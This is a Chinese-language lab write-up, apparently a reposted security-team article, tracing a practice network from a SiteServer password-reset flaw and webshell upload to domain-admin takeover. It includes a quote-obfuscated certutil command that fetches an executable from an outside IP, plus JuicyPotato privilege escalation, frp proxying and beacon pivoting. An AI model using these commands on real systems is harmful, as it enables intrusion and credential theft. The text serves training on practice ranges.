从web端getshell到内网域控
2023-5-12 00:1:46
Author: 白帽子(查看原文)
阅读量:25
收藏
先说结论
这套环境刚开始大体看了下以为比较有难度,没想到拿下域内OA办公机时直接把域管密码dump下来了,感觉属实草率了。。。不过整体来说还是可以的,对于在实战中遇到域控不多的铁子可以拿来练练手熟悉环境,最后感谢作者提供的靶场环境,大佬辛苦了!信息收集
已知靶标URL为http://www.moonlab.com/
(搭建环境访问时需要绑定hosts),直接访问域名没啥东西siteserver管理员密码找回
siteserver之前爆出过管理员密码找回功能存在缺陷,详情见此
使用密码找回功能
http://www.moonlab.com/siteserver/forgetPassword.aspx搜索框中输入JavaScript,找到javascript.enabled将其转换为false后台getshell
siteserver后台getshell方法很多,详情
这里使用模板文件上传拿shell。
在’系统管理’–’站点模版管理’–’导入站点模版’,使用csroad大佬的webshell免杀生成器生成ashx CMD马,压缩为rar上传到目标模版里,然后访问即可获取webshell上线cs,本机信息收集,搭代理
c""""e""""r""""t""""u""""t""""i""""l.exe -urlcache -split -f http://23.234.209.205:8000/6666.exe 6666.exe
查看权限,梼杌插件JuicyPotato (ms16-075)提权至systemREG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
shell tasklist /svc | findstr "TermService"
shell netstat -ano | findstr "992"
上frp搭代理(已经读出管理员密码,确认开启3389,故忽略此步骤接下来直接在虚拟机内靶机上操作,否则太卡。。。)shell frpc.exe -c socks5.ini
内网横向
fscan探测内网信息,发现1.130机器存在通达OAsystem权限带360、不出网,双网卡存在10.10.10.段,2012操作系统正向连接上线CS,首先生成监听器beacon-tcp,监听在17775端口然后CS生成一个stageless木马,选定刚才的新监听器
connect 10.10.1.130 17775
域控
Tide安全团队正式成立于2019年1月,是新潮信息旗下以互联网攻防技术研究为目标的安全团队,团队致力于分享高质量原创文章、开源安全工具、交流安全技术,研究方向覆盖网络攻防、系统安全、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。
团队作为“省级等保关键技术实验室”先后与哈工大、齐鲁银行、聊城大学、交通学院等多个高校名企建立联合技术实验室,近三年来在网络安全技术方面开展研发项目60余项,获得各类自主知识产权30余项,省市级科技项目立项20余项,研究成果应用于产品核心技术研究、国家重点科技项目攻关、专业安全服务等。对安全感兴趣的小伙伴可以加入或关注我们。
文章来源: http://mp.weixin.qq.com/s?__biz=MzAwMDQwNTE5MA==&mid=2650246688&idx=2&sn=245bf61d0f8e1b699d864f6ec6f3daf0&chksm=82ea5589b59ddc9f63fae63a96d3983569b25712521095bf85ec0f6f44253cd76915dd197491#rd
如有侵权请联系:admin#unsafe.sh